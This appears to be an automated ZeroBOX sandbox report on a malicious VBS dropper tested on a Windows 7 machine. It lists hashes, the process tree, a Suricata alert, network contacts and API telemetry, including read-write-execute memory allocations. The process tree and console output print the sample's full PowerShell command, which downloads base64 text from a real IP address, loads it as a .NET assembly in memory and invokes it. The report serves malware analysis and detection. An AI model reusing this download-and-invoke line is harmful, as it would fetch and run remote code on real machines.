Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	May 9, 2023, 6:25 p.m.	May 9, 2023, 6:29 p.m.

Size	92.8KB
Type	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5	`3d54b88bf2b6bcd1126ef4eb20d9e9f9`
SHA256	`d9577a11fb93cf09c220f70d087e55eb4c7c5fed0537aebd8013e7e01a8d5d15`
CRC32	`F5B6B5A0`
ssdeep	`768:mnHGdUBDCKtfYjE3Luo4+eaWZxidnOk9p0YFPk9Wai2Y:OHGd+CKtfSo4+sxidnOk9p0YFNai2Y`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\droidddxxxPayload.vbs
416
- cmd.exe "C:\Windows\system32\cmd.exe" /c powershell.exe [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://172.174.176.153/dll/new_rump_vb.net.txt'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('ø☀☞√�}П�◀@+@░�@@ø☀☞√�}П�.!}(ú░}nmz◀@+@░�@@*(+ø(!}(ú░}mz◀@+@░�@@*(+ø(!}(ú░}zmn◀@+@░�@@v*(+ø(n4*●*☞#:▶4(úø(@@*ú.0(úø(@@*ú](∞ú(.87](∞ú(.59](∞ú(4*●*☞#:▶4*●*☞#:▶▶☟ð}↓→+◀pø☀☞√�}П�ø☀☞√�}П�↓*(▲☟@*⇝','1No1me_Startup','2No3me_3tartup'))
  2164
  - powershell.exe powershell.exe [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://172.174.176.153/dll/new_rump_vb.net.txt'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('ø☀☞√�}П�◀@+@░�@@ø☀☞√�}П�.!}(ú░}nmz◀@+@░�@@*(+ø(!}(ú░}mz◀@+@░�@@*(+ø(!}(ú░}zmn◀@+@░�@@v*(+ø(n4*●*☞#:▶4(úø(@@*ú.0(úø(@@*ú](∞ú(.87](∞ú(.59](∞ú(4*●*☞#:▶4*●*☞#:▶▶☟ð}↓→+◀pø☀☞√�}П�ø☀☞√�}П�↓*(▲☟@*⇝','1No1me_Startup','2No3me_3tartup'))
    2256

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.174.176.153	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 172.174.176.153:80 -> 192.168.56.103:49165	2029538	ET HUNTING EXE Base64 Encoded potential malware	Misc activity

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 9, 2023, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2023, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2023, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2023, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 9, 2023, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2023, 6:25 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 9, 2023, 6:25 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 9, 2023, 6:25 p.m.			0	0

Command line console output was observed (12 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 9, 2023, 6:25 p.m.	buffer: Exception calling "Invoke" with "2" argument(s): "The type initializer for '<Mo console_handle: 0x00000023	1	1
WriteConsoleW May 9, 2023, 6:25 p.m.	buffer: dule>' threw an exception." console_handle: 0x0000002f	1	1
WriteConsoleW May 9, 2023, 6:25 p.m.	buffer: At line:1 char:237 console_handle: 0x0000003b	1	1
WriteConsoleW May 9, 2023, 6:25 p.m.	buffer: + [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient console_handle: 0x00000047	1	1
WriteConsoleW May 9, 2023, 6:25 p.m.	buffer: ).DownloadString('http://172.174.176.153/dll/new_rump_vb.net.txt'));[System.App console_handle: 0x00000053	1	1
WriteConsoleW May 9, 2023, 6:25 p.m.	buffer: Domain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invok console_handle: 0x0000005f	1	1
WriteConsoleW May 9, 2023, 6:25 p.m.	buffer: e <<<< ($null, [object[]] ('ø☀☞√�}П�◀@+@░�@@ø☀☞√�}П�.!}(ú░}nmz◀@+@░�@@*(+ø(!}(ú console_handle: 0x0000006b	1	1
WriteConsoleW May 9, 2023, 6:25 p.m.	buffer: ░}mz◀@+@░�@@(+ø(!}(ú░}zmn◀@+@░�@@v(+ø(n4●☞#:▶4(úø(@@ú.0(úø(@@ú](∞ú(.87](∞ console_handle: 0x00000077	1	1
WriteConsoleW May 9, 2023, 6:25 p.m.	buffer: ú(.59](∞ú(4●☞#:▶4●☞#:▶▶☟ð}↓→+◀pø☀☞√�}П�ø☀☞√�}П�↓(▲☟@⇝','1No1me_Startup',' console_handle: 0x00000083	1	1
WriteConsoleW May 9, 2023, 6:25 p.m.	buffer: 2No3me_3tartup')) console_handle: 0x0000008f	1	1
WriteConsoleW May 9, 2023, 6:25 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x0000009b	1	1
WriteConsoleW May 9, 2023, 6:25 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000000a7	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064a6e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064a820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064a820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064a820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064a020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064a020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064a020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064a020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064a020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064a020 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064a820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064a820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064a820 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ada0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ada0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ada0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064aaa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ada0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ada0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ada0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ada0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ada0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ada0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ada0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ab60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ab60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ab60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ab60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ab60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ab60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ab60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ab60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ab60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ab60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ab60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ab60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ab60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064ab60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064abe0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064abe0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064aae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064aae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064aae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064aae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064aae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 9, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0064aae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 9, 2023, 6:25 p.m.		1	1	0

Powershell script has download & invoke calls (1 event)

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header, Connection to IP address

suspicious_request

GET http://172.174.176.153/dll/new_rump_vb.net.txt

Performs some HTTP requests (1 event)

request

GET http://172.174.176.153/dll/new_rump_vb.net.txt

Allocates read-write-execute memory (usually to unpack itself) (50 out of 166 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 1179648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02880000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02492000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02881000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02882000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02517000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02502000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02515000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02850000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02503000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02504000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02505000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02506000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02507000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02508000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02509000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f13000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f14000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f15000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f16000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f17000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f18000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f19000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 9, 2023, 6:25 p.m.	process_identifier: 2256 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
